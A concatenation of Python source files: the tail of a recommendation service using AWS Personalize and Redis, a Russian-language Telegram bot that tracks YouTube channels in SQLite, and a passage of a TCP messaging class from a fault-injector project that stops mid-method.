logging.info('send request to filter to get recommend data...')
host = MANDATORY_ENV_VARS['FILTER_HOST']
port = MANDATORY_ENV_VARS['FILTER_PORT']
svc_url = "http://{}:{}/filter/get_recommend_data?userId={}&recommendType={}" \
.format(host, port, user_id, recommend_type)
logging.info("svc_url:{}".format(svc_url))
return get_data_request(svc_url, lambda json_data: json_data['data'])
def get_recommend_from_personalize(user_id):
item_list = []
# trigger personalize api
get_recommendations_response = personalize_runtime.get_recommendations(
campaignArn=ps_config['CampaignArn'],
userId=str(user_id),
)
result_list = get_recommendations_response['itemList']
for item in result_list:
item_list.append({
"id": item['itemId'],
"description": 'personalize|{}'.format(str(item['score'])),
"tag": 'recommend'
})
return item_list
@xasync
def read_ps_config_message():
logging.info('read_ps_message start')
# Read existed stream message
stream_message = rCache.read_stream_message(ps_result)
if stream_message:
logging.info("Handle existed stream ps-result message")
handle_stream_message(stream_message)
while True:
logging.info('wait for reading ps-result message')
localtime = time.asctime( time.localtime(time.time()))
logging.info('start read stream: time: {}'.format(localtime))
try:
stream_message = rCache.read_stream_message_block(ps_result)
if stream_message:
handle_stream_message(stream_message)
except redis.ConnectionError:
localtime = time.asctime( time.localtime(time.time()))
logging.info('get ConnectionError, time: {}'.format(localtime))
time.sleep( sleep_interval )
def handle_stream_message(stream_message):
logging.info('get stream message from {}'.format(stream_message))
file_type, file_path, file_list = parse_stream_message(stream_message)
logging.info('start reload data process in handle_stream_message')
logging.info('file_type {}'.format(file_type))
logging.info('file_path {}'.format(file_path))
logging.info('file_list {}'.format(file_list))
global ps_config
for file_name in file_list:
if MANDATORY_ENV_VARS['PS_CONFIG'] in file_name:
logging.info("reload config file: {}".format(file_name))
ps_config = load_config(file_name)
def parse_stream_message(stream_message):
for stream_name, message in stream_message:
for message_id, value in message:
decode_value = convert(value)
file_type = decode_value['file_type']
file_path = decode_value['file_path']
file_list = decode_value['file_list']
return file_type, file_path, file_list
# convert stream data to str
def convert(data):
if isinstance(data, bytes):
return data.decode('ascii')
elif isinstance(data, dict):
return dict(map(convert, data.items()))
elif isinstance(data, tuple):
return map(convert, data)
else:
return data
def load_config(file_path):
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
file_key = '{}/{}'.format(s3_prefix, file_path)
s3 = boto3.resource('s3')
try:
object_str = s3.Object(s3_bucket, file_key).get()[
'Body'].read().decode('utf-8')
except Exception as ex:
logging.info("get {} failed, error:{}".format(file_key, ex))
object_str = "{}"
config_json = json.loads(object_str)
return config_json
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error("Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var] = str(os.environ.get(var))
global rCache
rCache = cache.RedisCache(host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
global personalize_runtime
personalize_runtime = boto3.client('personalize-runtime', MANDATORY_ENV_VARS['AWS_REGION'])
global ps_config
ps_file_path = "system/personalize-data/ps-config/ps_config.json"
ps_config = load_config(ps_file_path)
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%Y-%m-%d:%H:%M:%S',
level=logging.INFO)
init()
uvicorn.run(app, host="0.0.0.0", port=int(MANDATORY_ENV_VARS['RETRIEVE_PORT']))
|
content_bot.py
|
import datetime as dt
import os
import sqlite3
import threading
from time import sleep
import requests
import telebot
from dotenv import load_dotenv
from loguru import logger
from telebot import types
load_dotenv()
logger.add(
"bot_debug.log",
format="{time} {level} {message}",
level="DEBUG",
rotation="10 MB",
retention="7 days",
compression="zip",
)
TELEGRAM_TOKEN = os.getenv("TELEGRAM_TOKEN")
TELEGRAM_CHAT_ID = os.getenv("TELEGRAM_CHAT_ID")
GOOGLE_API_KEY = os.getenv("GOOGLE_API_KEY")
BOT = telebot.TeleBot(TELEGRAM_TOKEN)
PHOTO_GOBLIN_HELLO = (
"https://www.meme-arsenal.com/memes/990b461fea0832a44ab4f588e6cf37e0.jpg"
)
PHOTO_PEPE_THINKING = (
"https://www.meme-arsenal.com/memes/8b3ef2c65d5763539e34a9bd5bff7b9d.jpg"
)
PHOTO_ERIC_THINKING = "https://i.ytimg.com/vi/yDly4gmLLHg/mqdefault.jpg"
GET_CHANNEL_BY_USERNAME = (
"https://youtube.googleapis.com/youtube/v3/"
"channels?part=snippet&forUsername="
)
GET_CHANNEL_BY_ID = (
"https://youtube.googleapis.com/youtube/v3/channels?part=snippet&id="
)
SEARCH_VIDEO_BY_CHANNEL_ID = (
"https://www.googleapis.com/youtube/v3/"
"search?order=date&part=snippet&channelId="
)
SEARCH_BROKEN_CHANNEL = (
"https://youtube.googleapis.com/youtube/v3/"
"search?part=snippet&maxResults=5&q="
)
GET_CHANNEL_ID_FROM_VIDEO = (
"https://youtube.googleapis.com/youtube/v3/videos?part=snippet&id="
)
YOUTUBE_URL = "https://www.youtube.com/watch?v="
DATE_FORMAT = "%d.%m.%Y"
__connection = None
@logger.catch
def get_connection():
"""Функция подключения к базе данных"""
global __connection
if __connection is None:
__connection = sqlite3.connect("channels.db", check_same_thread=False)
return __connection
@logger.catch
def init_db(force: bool = False):
"""Функция создания БД"""
conn = get_connection()
c = conn.cursor()
if force:
c.execute("DROP TABLE IF EXISTS channel_list")
c.execute(
"""
CREATE TABLE IF NOT EXISTS channel_list (
id INTEGER PRIMARY KEY,
title TEXT,
url TEXT,
video_url,
rating INTEGER
)
"""
)
conn.commit()
@logger.catch
@BOT.message_handler(commands=["start"])
def start_message(message):
"""Функция приветствует юзера и предлагает продолжить работу"""
BOT.send_photo(
message.chat.id,
photo=PHOTO_GOBLIN_HELLO,
caption=f"Привет, калтэнтеры!\n"
f"Сегодня {dt.date.today().strftime(DATE_FORMAT)}\n"
"Cмотрите описание бота и используйте команды.\n",
)
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="🐾 Продолжить"))
msg = BOT.send_message(message.chat.id, "Продолжаем?", reply_markup=markup)
BOT.register_next_step_handler(msg, process_step)
@logger.catch
@BOT.message_handler(commands=["menu"])
def selects_actions(message):
"""Функция отображает все кнопки меню и предлагает выбрать действие"""
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="🍻 Смотреть контент"))
markup.add(types.InlineKeyboardButton(text="📀 Добавить видео"))
markup.add(types.InlineKeyboardButton(text="📹 Добавить канал"))
markup.add(types.InlineKeyboardButton(text="👀 Показать все видео"))
markup.add(types.InlineKeyboardButton(text="👀 Показать все каналы"))
msg = BOT.send_photo(
message.chat.id,
photo=PHOTO_PEPE_THINKING,
caption="Чего желаете?",
reply_markup=markup,
)
BOT.register_next_step_handler(msg, process_step)
@logger.catch
@BOT.message_handler(content_types=["text"])
def process_step(message, video_url=None):
"""Функция распределяет дальнейшие действия в зависимости
от условия полученной команды"""
if message.text == "🍻 Смотреть контент":
BOT.send_message(
message.chat.id, "Начинаем просмотр, хорошей зачилки."
)
sleep(1)
post_videos_to_watch(message)
elif message.text == "📀 Добавить видео":
add_url_new_videos(message)
elif message.text == "🐾 Продолжить":
selects_actions(message)
elif message.text == "👀 Показать все каналы":
show_all_channels(message)
elif message.text == "📹 Добавить канал":
add_channel_url(message)
elif message.text == "❌ Удалить канал":
query_delete_channel(message)
elif message.text == "👉 Отложить видео":
deferral_video(message, video_url)
elif message.text == "❌ Удалить видео":
delete_video(message, video_url)
elif message.text == "👉 Следующее видео":
post_videos_to_watch(message)
elif message.text == "👈 Вернуться в меню":
selects_actions(message)
elif message.text == "👀 Показать все видео":
show_all_videos(message)
elif message.text == "/start":
start_message(message)
elif message.text == "/menu":
selects_actions(message)
@logger.catch
def show_all_videos(message):
"""Функция показывает все имеющиеся видео в БД"""
conn = get_connection()
c = conn.cursor()
c.execute(
"SELECT DISTINCT(video_url)\
FROM channel_list\
WHERE video_url NOT NULL\
ORDER BY rating DESC"
)
(urls) = c.fetchall()
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
if urls:
all_urls = []
for url in urls:
all_urls.append("".join(url))
for url in all_urls:
BOT.send_message(message.chat.id, url)
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
BOT.send_message(
message.chat.id,
"Список окончен. Выберите действие:",
reply_markup=markup,
)
else:
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
BOT.send_message(message.chat.id, "Нет видео.", reply_markup=markup)
@logger.catch
def show_all_channels(message):
"""Функция показывает все имеющиеся каналы в БД"""
conn = get_connection()
c = conn.cursor()
c.execute(
"SELECT DISTINCT(title)\
FROM channel_list\
WHERE title NOT NULL AND url NOT NULL\
ORDER BY rating DESC"
)
(channel_names) = c.fetchall()
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="📹 Добавить канал"))
markup.add(types.InlineKeyboardButton(text="❌ Удалить канал"))
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
if channel_names:
BOT.send_message(message.chat.id, "Список всех каналов:\n")
for name in channel_names:
BOT.send_message(message.chat.id, f"{''.join(name)}")
BOT.send_message(
message.chat.id,
"Список окончен. Выберите действие:",
reply_markup=markup,
)
else:
BOT.send_message(message.chat.id, "У вас не добавлены каналы.")
BOT.register_next_step_handler(message, selects_actions)
@logger.catch
def add_channel_url(message):
"""Функция ожидает ссылку на канал и переходит к функции
ввода рейтинга для канала"""
msg = BOT.send_message(message.chat.id, "Введите ссылку на канал.")
BOT.register_next_step_handler(msg, add_channel_raiting)
@logger.catch
def add_channel_raiting(message):
"""Функция проверяет корректность ссылки на канал, если всё верно,
то переходит к следующей функции добавления канала"""
if message.text.startswith(
"https://www.youtube.com/"
) or message.text.startswith("https://youtube.com/"):
msg = BOT.send_message(
message.chat.id,
"Введите рейтинг канала от 1 до 10\n"
"Видео будут упорядочены по рейтингу канала.",
)
channel_url = message.text
BOT.register_next_step_handler(msg, add_channel, channel_url)
else:
BOT.send_message(
message.chat.id, "Вы ввели неправильные данные, начните заново."
)
@logger.catch
def add_channel(message, channel_url):
"""Функция Добавляет новый канала в БД"""
conn = get_connection()
c = conn.cursor()
try:
if (
channel_url.startswith("https://www.youtube.com/")
or channel_url.startswith("https://youtube.com/")
and 0 < int(message.text) <= 10
):
BOT.send_photo(
message.chat.id,
photo=PHOTO_ERIC_THINKING,
caption="Я думаю...",
)
rating = message.text
if len(channel_url.split("/")):
cut_link = channel_url.split("/")[4:]
eng_channel_name = cut_link[0]
name_lenght = len(eng_channel_name)
if name_lenght < 24:
response = requests.get(
GET_CHANNEL_BY_USERNAME
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
else:
response = requests.get(
GET_CHANNEL_BY_ID
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
sleep(1)
if "items" not in response:
response = requests.get(
SEARCH_BROKEN_CHANNEL
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
channel_name = response.json()["items"][0]["snippet"][
"channelTitle"
]
else:
channel_name = response.json()["items"][0]["snippet"]["title"]
c.execute(
"SELECT DISTINCT(title)\
FROM channel_list\
WHERE title NOT NULL\
ORDER BY rating DESC"
)
(all_channels) = c.fetchall()
channels_name = []
for name in all_channels:
channels_name.append("".join(name))
if channel_name not in channels_name:
c.execute(
"INSERT INTO channel_list(url, title, rating)\
VALUES (?, ?, ?);",
(channel_url, channel_name, rating),
)
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
BOT.send_message(
message.chat.id,
f"Канал '{channel_name}' добавлен в базу.",
reply_markup=markup,
)
markup.add(
types.InlineKeyboardButton(text="👈 Вернуться в меню")
)
conn.commit()
else:
BOT.send_message(message.chat.id, "Канал уже есть в базе")
except:
BOT.send_message(message.chat.id, "Вы ввели неправильные данные")
@logger.catch
def query_delete_channel(message):
"""Функция ожидает название канала для удаления и переходит
к следующей функции, которая удаляет канал"""
msg = BOT.send_message(
message.chat.id,
"Введите канал для удаления:",
)
BOT.register_next_step_handler(msg, delete_channel)
@logger.catch
def delete_channel(message):
"""Функция удаляет канал из базы данных"""
conn = get_connection()
c = conn.cursor()
channel_name = message.text
c.execute("SELECT title FROM channel_list WHERE title IS NOT NULL")
(base) = c.fetchall()
all_names = []
for name in base:
all_names.append("".join(name))
if channel_name in all_names:
c.execute(
"DELETE FROM channel_list WHERE title IN (?) AND url NOT NULL;", (channel_name,)
)
BOT.send_message(message.chat.id, f"Канал '{channel_name}' удалён.")
conn.commit()
else:
BOT.send_message
(message.chat.id, "В вашей базе нет такого канала, начните заново.")
@logger.catch
def add_url_new_videos(message):
"""Функция ожидаает ссылку с видео и переходит в функции,
которая добавляет эту ссылку в БД"""
BOT.send_message(
message.chat.id, "Отправьте ссылку на видео, я добавлю его в базу."
)
BOT.register_next_step_handler(message, add_new_video)
@logger.catch
def add_new_video(message):
"""Функция добавляет новое видео в БД"""
conn = get_connection()
c = conn.cursor()
if message.text.startswith(
"https://www.youtube.com/watch"
) or message.text.startswith("https://youtu.be/"):
BOT.send_photo(
message.chat.id, photo=PHOTO_ERIC_THINKING, caption="Я думаю..."
)
sleep(1.5)
video_url = message.text
if len(message.text.split("/")):
if "=" in message.text:
cut_link = message.text.split("=")
eng_channel_name = cut_link[1]
else:
cut_link = message.text.split("/")[3:]
eng_channel_name = cut_link[0]
response = requests.get(
GET_CHANNEL_ID_FROM_VIDEO
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
channel_name = response.json()["items"][0]["snippet"]["channelTitle"]
c.execute(
"CREATE TABLE query_channel AS SELECT title, rating\
FROM channel_list\
GROUP BY title\
HAVING rating NOT NULL"
)
c.execute(
"INSERT INTO channel_list (title, video_url) VALUES (?, ?);",
(channel_name, video_url),
)
c.executescript(
"UPDATE channel_list\
SET rating =\
(SELECT rating FROM query_channel\
WHERE channel_list.title = query_channel.title);\
UPDATE channel_list\
SET rating = 0\
WHERE (rating IS NULL)"
)
c.execute("DROP TABLE query_channel")
BOT.send_message(message.chat.id, "Видео добавлено.")
conn.commit()
else:
BOT.send_message(
message.chat.id, "Вы отправили неверную ссылку, начните сначала."
)
@logger.catch
def delete_video(message, video_url):
"""Функция удаления видео из базы"""
conn = get_connection()
c = conn.cursor()
c.execute("DELETE FROM channel_list WHERE video_url IN (?);", (video_url,))
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="👉 Следующее видео"))
BOT.send_message(message.chat.id, "Видео удалено.", reply_markup=markup)
conn.commit()
@logger.catch
def deferral_video(message, video_url):
"""Функция пропустить видео"""
conn = get_connection()
c = conn.cursor()
c.execute(
"UPDATE channel_list SET rating = Null WHERE video_url IN(?);",
(video_url,),
)
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="👉 Следующее видео"))
BOT.send_message(message.chat.id, "Видео отложено.", reply_markup=markup)
conn.commit()
@logger.catch
def post_videos_to_watch(message):
"""Функция достаёт из базы все видео и выдаёт их в очереди по одному"""
conn = get_connection()
c = conn.cursor()
c.execute(
"SELECT DISTINCT(video_url)\
FROM channel_list\
WHERE video_url NOT NULL\
ORDER BY rating DESC"
)
(urls) = c.fetchall()
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
if urls:
all_urls = []
for url in urls:
all_urls.append("".join(url))
for url in all_urls:
BOT.send_message(message.chat.id, url)
markup.add(types.InlineKeyboardButton(text="👉 Отложить видео"))
markup.add(types.InlineKeyboardButton(text="❌ Удалить видео"))
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
msg = BOT.send_message(
message.chat.id, "Выберите действие:", reply_markup=markup
)
BOT.register_next_step_handler(msg, process_step, url)
break
else:
BOT.send_message(
message.chat.id, "В базе не осталось видео для просмотра."
)
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
BOT.send_message(message.chat.id, "Конец.", reply_markup=markup)
BOT.register_next_step_handler(message, selects_actions)
@logger.catch
def parsing_new_video_from_channel():
"""Функция достаёт из базы все имеющиеся каналы,
проверяет есть ли на каналах новые видео"""
threading.Timer(86400, parsing_new_video_from_channel).start()
conn = get_connection()
c = conn.cursor()
c.execute("SELECT title, url FROM channel_list WHERE url NOT NULL")
(channel_name_and_url) = c.fetchall()
for title, url in channel_name_and_url:
logger.info("Bot trying to get videos")
sleep(2)
if len(url.split("/")):
cut_link = url.split("/")[4:]
eng_channel_name = cut_link[0]
name_lenght = len(eng_channel_name)
if name_lenght < 24:
get_channel_info = requests.get(
GET_CHANNEL_BY_USERNAME
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
else:
get_channel_info = requests.get(
GET_CHANNEL_BY_ID + eng_channel_name + "&key=" + GOOGLE_API_KEY
)
if "items" not in get_channel_info:
get_channel_info = requests.get(
SEARCH_BROKEN_CHANNEL
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
channel_name = get_channel_info.json()["items"][0]["snippet"][
"channelTitle"
]
channel_id = get_channel_info.json()["items"][0]["snippet"][
"channelId"
]
else:
channel_name = get_channel_info.json()["items"][0]["snippet"][
"title"
]
channel_id = get_channel_info.json()["items"][0]["id"]
search_new_video = requests.get(
SEARCH_VIDEO_BY_CHANNEL_ID
+ channel_id
+ "&maxResults=30&key="
+ GOOGLE_API_KEY
)
date_of_publication = search_new_video.json()["items"][0]["snippet"][
"publishedAt"
][:10]
video_id = search_new_video.json()["items"][0]["id"]
video_id_in_broken_channels = search_new_video.json()["items"][1]["id"]
if "videoId" in video_id:
new_video = YOUTUBE_URL + video_id["videoId"]
else:
new_video = YOUTUBE_URL + video_id_in_broken_channels["videoId"]
date_today = str(dt.date.today())
if date_of_publication == date_today:
c.execute(
"CREATE TABLE query_channel AS SELECT title, rating\
FROM channel_list\
GROUP BY title\
HAVING rating NOT NULL"
)
c.execute(
"INSERT INTO channel_list (video_url, title)\
VALUES (?, ?);",
(new_video, channel_name),
)
c.execute(
"UPDATE channel_list\
SET rating =\
(SELECT rating FROM query_channel\
WHERE channel_list.title = query_channel.title)"
)
c.execute("DROP TABLE query_channel")
sleep(1)
logger.info("Bot added video")
conn.commit()
else:
logger.info("No new videos were found")
logger.info("Parsing done")
if __name__ == "__main__":
logger.info("Bot started work")
while True:
try:
init_db()
thread2 = threading.Thread(target=parsing_new_video_from_channel())
thread2.start()
sleep(15)
thread1 = threading.Thread(target=BOT.polling(none_stop=True))
thread1.start()
except Exception as error:
logger.error(error)
BOT.send_message(TELEGRAM_CHAT_ID, f"Error at startup {error}")
sleep(30)
|
msg_entity.py
|
"""
MIT License
Copyright (c) 2018 AlessioNetti
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import select, socket, threading
import struct, json, logging
from fault_injector.util.misc import getipport, formatipport, DummySocketBuilder
from threading import Semaphore
from collections import deque
from time import time
from abc import ABC, abstractmethod
class MessageEntity(ABC):
"""
Abstract class that supplies a basic message-based communication protocol based on TCP sockets.
This class supports one-to-many communication with broadcast capabilities, and implements a message queue.
Messages must be supplied as dictionaries of arbitrary length, which will be converted to json.
Users must implement the 'listen' abstract method, in which the behavior of the listener is implemented. This
is relevant depending on the nature of the communication entity (client or server).
"""
# Logger for the class
logger = logging.getLogger('MessageEntity')
# ID used to identify outbound broadcast messages
BROADCAST_ID = '*'
DUMMY_STR = b'-'
# Static definitions for messages regarding the status of a connection
CONNECTION_FINALIZED_MSG = -1
CONNECTION_LOST_MSG = 0
CONNECTION_RESTORED_MSG = 1
CONNECTION_TOREMOVE_MSG = 2
@staticmethod
def is_status_message(msg):
"""
Inspects the type of a message received on the queue, and determines if it is a status message
When connections are lost or restored, status messages are injected into the input queue in order to
asynchronously signal the status change. This method allows to determine if a message in the queue is of
such type.
:param msg: The message to be inspected
:return: A tuple: the first element is True if msg is a status message, and the second expresses the
status change of the connection (depending on the constants defined above)
"""
if isinstance(msg, type(MessageEntity.CONNECTION_RESTORED_MSG)):
return True, msg
else:
return False, None
def __init__(self, socket_timeout=10, max_connections=100, re_send_msgs=False):
"""
Constructor of the class
:param socket_timeout: timeout for the underlying sockets
:param max_connections: maximum number of concurrent connections (used for servers only)
:param re_send_msgs: if True, the entity will keep track of sent/received messages, and eventually attempt
to resend them to hosts that have not received them due to a connection loss
"""
# The thread object for the listener and a termination flag
self._thread = None
self._initialized = False
self._hasToFinish = False
self.reSendMsgs = re_send_msgs
# Counter that keeps track of the current sequence number for sent messages
self._curr_seq_num = 0
# This timestamp is used to identify the session message were sent in. If the server restarts, this number will
# increase, allowing to distinguish messages with the same sequence number
self._curr_seq_ts = int(time())
self._seq_num_lim = 4000000000
# Timeout to be used for the sockets
self.sock_timeout = socket_timeout
# Maximum number of requests for server sockets
self.max_connections = max_connections
# The dictionary of sockets registered for communication, whether server or client
# The keys are in the form of (ip, port) tuples
self._registeredHosts = {}
# The list of hosts registered for the 'select' calls (also includes the server socket, if present)
self._readSet = []
# Input and output message queues
self._inputQueue = deque()
self._outputQueue = deque()
# Locks for access to input and output queues
self._inputLock = threading.Lock()
self._outputLock = threading.Lock()
# This socket is used to wake up the messaging thread when there are outbound messages to be sent
reads, writes = DummySocketBuilder.getDummySocket()
self._dummy_sock_r = reads
self._dummy_sock_w = writes
# Semaphore for producer-consumer style computation on the message queue
self._messageSem = Semaphore(0)
# A list that stores the history of sent messages
self._historyLen = 4096
self._msgHistory = deque(maxlen=self._historyLen)
def start(self):
"""
Method that starts the listener thread
"""
if not self._initialized:
self._thread = threading.Thread(target=self._listen)
self._initialized = True
self._hasToFinish = False
self._thread.start()
MessageEntity.logger.debug('Messaging thread successfully started')
else:
MessageEntity.logger.warning('Cannot start messaging thread if it is already running')
def stop(self):
"""
Method that terminates the listener thread
"""
if self._initialized:
self._hasToFinish = True
self._thread.join()
self._thread = None
self._initialized = False
MessageEntity.logger.debug('Messaging thread successfully stopped')
def get_registered_hosts(self):
"""
Returns a list of (ip, port) addresses with which communication is currently active
"""
return list(self._registeredHosts.keys())
def get_n_registered_hosts(self):
"""
Returns the number of currently connected hosts
:return: the number of currently connected hosts
"""
return len(self._registeredHosts)
def send_msg(self, addr, comm):
"""
Public method for sending messages, that uses address (ip, port) tuples to identify an host
:param addr: the address (ip, port) tuple of the target host
:param comm: The message to be sent
"""
if comm is None or not isinstance(comm, dict):
MessageEntity.logger.error('Messages must be supplied as dictionaries to send_msg')
return
self._outputLock.acquire()
self._outputQueue.append((addr, comm))
self._outputLock.release()
# Writing to the internal socket to wake up the server if it is waiting on a select call
self._dummy_sock_w.send(MessageEntity.DUMMY_STR)
def broadcast_msg(self, comm):
"""
Public method for broadcasting messages
:param comm: The message to be sent
"""
if comm is None or not isinstance(comm, dict):
MessageEntity.logger.error('Messages must be supplied as dictionaries to send_msg')
return
addr = (MessageEntity.BROADCAST_ID, MessageEntity.BROADCAST_ID)
self._outputLock.acquire()
self._outputQueue.append((addr, comm))
self._outputLock.release()
# Writing to the internal pipe to wake up the server if it is waiting on a select call
self._dummy_sock_w.send(MessageEntity.DUMMY_STR)
def peek_msg_queue(self):
"""
Returns the length of the message queue
:return: The length of the message queue
"""
return len(self._inputQueue)
def pop_msg_queue(self, blocking=True):
"""
Pops the first element of the message queue
:param blocking: boolean flag. If True, the method is blocking, and the process is halted until a new message
has been received (if the queue is empty)
:return: The first message in the queue
"""
self._messageSem.acquire(blocking)
self._inputLock.acquire()
addr, comm = self._inputQueue.popleft() if len(self._inputQueue) > 0 else (None, None)
self._inputLock.release()
return addr, comm
def remove_host(self, addr):
"""
Removes an host from the list of active hosts
Public, asynchronous version of the private method
:param addr: The (ip, port) address corresponding to the host to remove
"""
self._outputLock.acquire()
self._outputQueue.append((addr, MessageEntity.CONNECTION_TOREMOVE_MSG))
self._outputLock.release()
def _flush_output_queue(self):
"""
Private method that tries to dispatch all pending messages in the output queue
"""
# Flushing the dummy socket used for triggering select calls
self._dummy_sock_r.recv(2048)
# We compute the number of messages currently in the output queue
n_msg = len(self._outputQueue)
for i in range(n_msg):
addr, msg = self._outputQueue.popleft()
is_status, status = MessageEntity.is_status_message(msg)
if is_status and status == MessageEntity.CONNECTION_TOREMOVE_MSG:
self._remove_host(addr)
else:
seq_num = (self._curr_seq_ts, self._curr_seq_num)
if self.reSendMsgs:
self._msgHistory.append((seq_num, addr, msg))
if addr[0] == MessageEntity.BROADCAST_ID:
to_remove = []
for re_addr in self._registeredHosts.keys():
if not self._send_msg(seq_num, re_addr, msg):
to_remove.append(re_addr)
for re_addr in to_remove:
self._remove_host(re_addr)
else:
if not self._send_msg(seq_num, addr, msg):
self._remove_host(addr)
# The sequence numbers wrap around a certain limit, and return to 0
self._curr_seq_num = (self._curr_seq_num + 1) % self._seq_num_lim
if self._curr_seq_num == 0:
# If the sequence number wraps around its limit, we update the session timestamp
self._curr_seq_ts = int(time())
def _forward_old_msgs(self, start_seq, addr):
"""
Forwards all messages that were sent in a certain time frame to an host that has recently restored its
connection
:param start_seq: starting sequence number of the forwarding window
:param addr: address of the target host for forwarding
"""
self._outputLock.acquire()
for m_seq_num, m_addr, msg in self._msgHistory:
# The part after the or serves to manage sequence number after wraparound, when the upper limit is reached
if start_seq < m_seq_num and m_addr[0] == MessageEntity.BROADCAST_ID:
self._outputQueue.append((addr, msg))
self._outputLock.release()
def _add_to_input_queue(self, addr, comm):
"""
Adds a message that has been received to the internal message queue
:param addr: The address (ip, port) of the sender host
:param comm: The message to be added to the queue
"""
self._inputQueue.append((addr, comm))
self._messageSem.release()
def _liveness_check(self, sock):
"""
Checks for the liveness of a socket by trying to read 1 byte (with MSG_PEEK). This supposes that the socket has
been flagged as readable by a previous 'select' call
:param sock: the socket to be checked
:return: True if the socket is alive, False otherwise
"""
try:
if len(sock.recv(1, socket.MSG_PEEK)) == 0:
MessageEntity.logger.info('Host %s has disconnected' % getipport(sock))
return False
else:
return True
except Exception:
MessageEntity.logger.info('Host %s has encountered an error' % getipport(sock))
return False
def _send_msg(self, seq_num, addr, comm):
"""
Private method that sends messages over specific active hosts of the registered hosts list
:param seq_num: sequence number of the message to be sent in tuple format
:param addr: address of the target host
:param comm: content of the message. Must be supplied as a dictionary. If None, an empty message with its header
only will be sent: this type of messages is used to identify message forwarding requests, with seq_num
representing the sequence number of the last valid message received from the host
:return: True if the message was successfully sent, False otherwise
"""
# Verifying if the input address has a corresponding open socket
try:
sock = self._registeredHosts[addr]
except KeyError:
sock = None
# If no valid socket was found for the input address, the message is not sent
if sock is None:
MessageEntity.logger.error('Cannot send to %s, is not registered' % formatipport(addr))
return False
if comm is None:
# An empty message containing only the header represents a message forwarding request
msg = struct.pack('>I', 0) + struct.pack('>I', seq_num[0]) + struct.pack('>I', seq_num[1])
else:
msg = json.dumps(comm).encode()
# Prefix each message with a 4-byte length (network byte order)
msg = struct.pack('>I', len(msg)) + struct.pack('>I', seq_num[0]) + struct.pack('>I', seq_num[1]) + msg
try:
sock.sendall(msg)
if self.reSendMsgs and comm is not None:
self._update_seq_num(addr, seq_num, received=False)
return True
except Exception:
MessageEntity.logger.error('Exception encountered while sending msg to %s' % getipport(sock))
# If an error is encountered during communication, we suppose the host is dead
return False
def _recv_msg(self, sock):
"""
Performs the reception of a message from a given socket. This supposes that the socket has been already flagged
as readable by a previous 'select' call
:param sock: the socket from which the message must be read
:return: A tuple containing the message dictionary and the sequence number of the associated message. If the
message is a forwarding request, the message will be None, and the sequence number will represent the last
valid message that was received by the sender from this host.
"""
# Read message length and unpack it into an integer
raw_msglen = self._recvall(sock, 4)
if not raw_msglen:
MessageEntity.logger.error('Corrupt message on received from %s' % getipport(sock))
return None, None
# Read message sequence number
raw_seqnum_ts = self._recvall(sock, 4)
raw_seqnum = self._recvall(sock, 4)
msglen = struct.unpack('>I', raw_msglen)[0]
seqnum = (struct.unpack('>I', raw_seqnum_ts)[0], struct.unpack('>I', raw_seqnum)[0])
if msglen == 0 and self.reSendMsgs:
# An empty message represents a message forwarding request. Such requests are NOT put on the queue
return None, seqnum
# Read the message data
raw_msg = self._recvall(sock, msglen)
try:
final_msg = json.loads(raw_msg.decode()) if raw_msg else None
except json.JSONDecodeError:
final_msg = None
if final_msg is not None and self.reSendMsgs:
self._update_seq_num(sock.getpeername(), seqnum, received=True)
return final_msg, seqnum
def _recvall(self, sock, n):
"""
Method that performs a series of reads on a socket in order to reach the (known) length of a received package
The length of the message is always known since it is a part of the header in our protocol.
:param sock: The socket from which the message must be received
:param n: The length of the message
"""
